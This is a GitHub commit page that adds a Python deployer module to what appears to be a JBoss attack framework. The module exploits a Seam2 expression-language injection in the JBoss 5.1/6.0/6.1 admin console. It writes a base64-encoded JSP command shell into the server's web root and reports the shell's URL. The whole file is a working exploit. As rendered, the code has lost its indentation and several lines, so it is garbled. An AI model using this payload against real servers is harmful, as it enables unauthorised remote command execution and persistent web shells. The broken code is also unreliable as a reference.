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Commit for issue #37
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* src/platform/jboss/deployers/
  -- Add a seam deployer for JBoss 5.1/6.0/6.1
  • Loading branch information
Bryan J. Alexander committed May 6, 2015
1 parent 748f51d commit b26bfa1
Showing 1 changed file with 97 additions and 0 deletions.
97 changes: 97 additions & 0 deletions src/platform/jboss/deployers/
Original file line number Diff line number Diff line change
@@ -0,0 +1,97 @@
from src.platform.jboss.interfaces import JINTERFACES
from src.platform.jboss.authenticate import checkAuth
from src.module.deploy_utils import parse_war_path
from os.path import abspath
from log import LOG
from urllib import quote_plus
from random import choice
from string import ascii_lowercase
from base64 import b64encode
import utility

versions = ['5.1', '6.0', '6.1']
def deploy(fingerengine, fingerprint):
""" Exploits Seam2 exposed by certain JBoss installs. Here we
require the use of a JSP payload that's written into the www root. The 5.1
deployer here varies slightly from the Metasploit version, which doesn't appear to
have been tested against 5.1. JBoss 5.1 writes into a cached temp, which is regenerated
every time that war folder is modified. This kills the shell.
JBoss 6.0/6.1 is the same, however, and appears to work fine.

war_file = abspath(fingerengine.options.deploy)
war_name = parse_war_path(war_file)
if '.war' in war_file:
tmp = utility.capture_input('This deployer requires a JSP, default to cmd.jsp? [Y/n]')
if 'n' in tmp.lower():

war_file = abspath('./src/lib/resources/cmd.jsp')
war_name = 'cmd'

utility.Msg("Preparing to deploy {0}...".format(war_name))

headers = {"Content-Type":"application/x-www-form-urlencoded"}
jsp_name = ''.join(choice(ascii_lowercase) for _ in range(5)) + '.jsp'
jsp = None

with open(war_file) as f:
jsp =
except Exception, e:
utility.Msg("Error reading payload file '%s': %s" % (war_file, e), LOG.ERROR)
return False

url = 'http://{0}:{1}/admin-console/login.seam'
uri = 'actionOutcome=/success.xhtml?user%3d%23{{expressions.getClass().'
uri += 'forName(\'\').getConstructor(\''
uri += 'java.lang.String\',expressions.getClass().forName(\''
uri += 'java.lang.Boolean\').getField(\'TYPE\').get(null))'
if fingerprint.version in ['6.0', '6.1']:
uri += '.newInstance(request.getRealPath(\'/{0}\')'
uri += '.newInstance(request.getRealPath(\'/../../../deploy/ROOT.war/{0}\')'
uri += '.replaceAll(\'\\\\\\\\\',\'/\'),false).write(expressions'
uri += '.getClass().forName(\'sun.misc.BASE64Decoder\').'
uri += 'getConstructor(null).newInstance(null).decodeBuffer'
uri += '(request.getParameter(\'c\'))).close()}}&c={1}'
uri = uri.format(jsp_name, quote_plus(b64encode(jsp)))

response = utility.requests_post(url.format(fingerengine.options.ip, fingerprint.port),
data = uri, headers=headers, allow_redirects=False)
if response.status_code == 401:
utility.Msg("Host %s:%s requires auth" %
(fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title, fingerprint.version)

if cookies:
response = utility.requests_post(url, data = uri,
cookies=cookies[0], auth=cookies[1])
except Exception, e:
utility.Msg("Error with authenticated request: %s" % str(e), LOG.ERROR)
utility.Msg("Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)

if response.status_code == 302:
if fingerprint.version in ['6.0', '6.1']:
invoke_url = "http://{0}:{1}/admin-console/{2}".format(fingerengine.options.ip, fingerprint.port, jsp_name)
invoke_url = "http://{0}:{1}/{2}".format(fingerengine.options.ip, fingerprint.port, jsp_name)

utility.Msg("{0} deployed to {1}".format(war_name, invoke_url), LOG.SUCCESS)
fingerengine.invoke_url = invoke_url
fingerengine.options.deploy = jsp_name

utility.Msg("Failed to deploy {0} (HTTP {1})".format(fingerengine.options.ip,

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